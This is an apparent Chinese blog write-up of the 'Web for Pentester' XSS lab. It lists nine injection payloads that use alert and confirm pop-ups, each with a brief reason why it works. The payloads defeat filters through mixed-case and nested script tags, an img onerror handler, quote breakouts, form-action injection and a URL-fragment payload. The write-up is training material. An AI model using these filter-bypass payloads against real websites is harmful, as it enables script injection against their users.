zoukankan      html  css  js  c++  java
  • web for pentester xss

    日期:2020-09-12

    XSS

    • example1

    DOM 型XSS 直接注入

    /xss/example1.php?name=<script>alert("xxx")</script>
    
    • example2

    DOM 型XSS 直接注入 没反应说明有过滤 首字母大写试试注入成功

    /xss/example2.php?name=<Script>alert("xxx")</Script>
    
    • example3

    DOM 型XSS 直接注入 没反应说明有过滤 首字母大写发现没效果 过滤掉了script标签 所以绕过一下使得过滤一次之后一样可以注入

    /xss/example3.php?name=<scr<script>ipt>alert(111)</SC</script>RIPT>
    
    • example4

    输入之前的poc发现直接返回error 应该是判断了script标签 所以只有跟换其他标签触发,例如img标签的onerror函数

    /xss/example3.php?name=<img%20src=""%20%20onerror=alert("111")>
    
    • example5

    输入alert直接报错,可以使用其他的弹出框window.confirm("sometext");window.prompt("sometext","defaultText");

    /xss/example5.php?name=<script>window.confirm("xss")</script>
    
    • example6

    通过f12 发现变量被复制给了a,所以可以直接闭合截断

    /xss/example6.php?name=";alert(111);"
    
    • example7

    通过f12 发现变量被复制给了a,所以可以直接闭合截断 与上面一题有区别的是这次是单引号闭合

    /xss/example7.php?name=hacker%27;%20alert(111);%27
    
    • example8
      通过看F12 可以看到action中的连接就是url,所以可以尝试form表单截断
    /xss/example8.php/"><script>alert("xss")</script>
    
    • example9

    默认url 是显示#hacker 所以是#后面的内容是注入点 但是这个只有在ie上才有效,当然也有可能有别的解题思路

    /xss/example9.php#<script>alert(1)</script>
    
  • 相关阅读:
    ZOJ4125 Sekiro
    ZOJ4118 Stones in the Bucket
    ZOJ4115 Wandering Robot
    ZOJ4113 Calandar
    【递归】N皇后问题 和 2n皇后问题 dfs
    7-18
    7_13
    二维前缀和
    64位整数乘法
    【分治】魔法石的诱惑
  • 原文地址:https://www.cnblogs.com/tongchengbin/p/13663389.html
Copyright © 2011-2022 走看看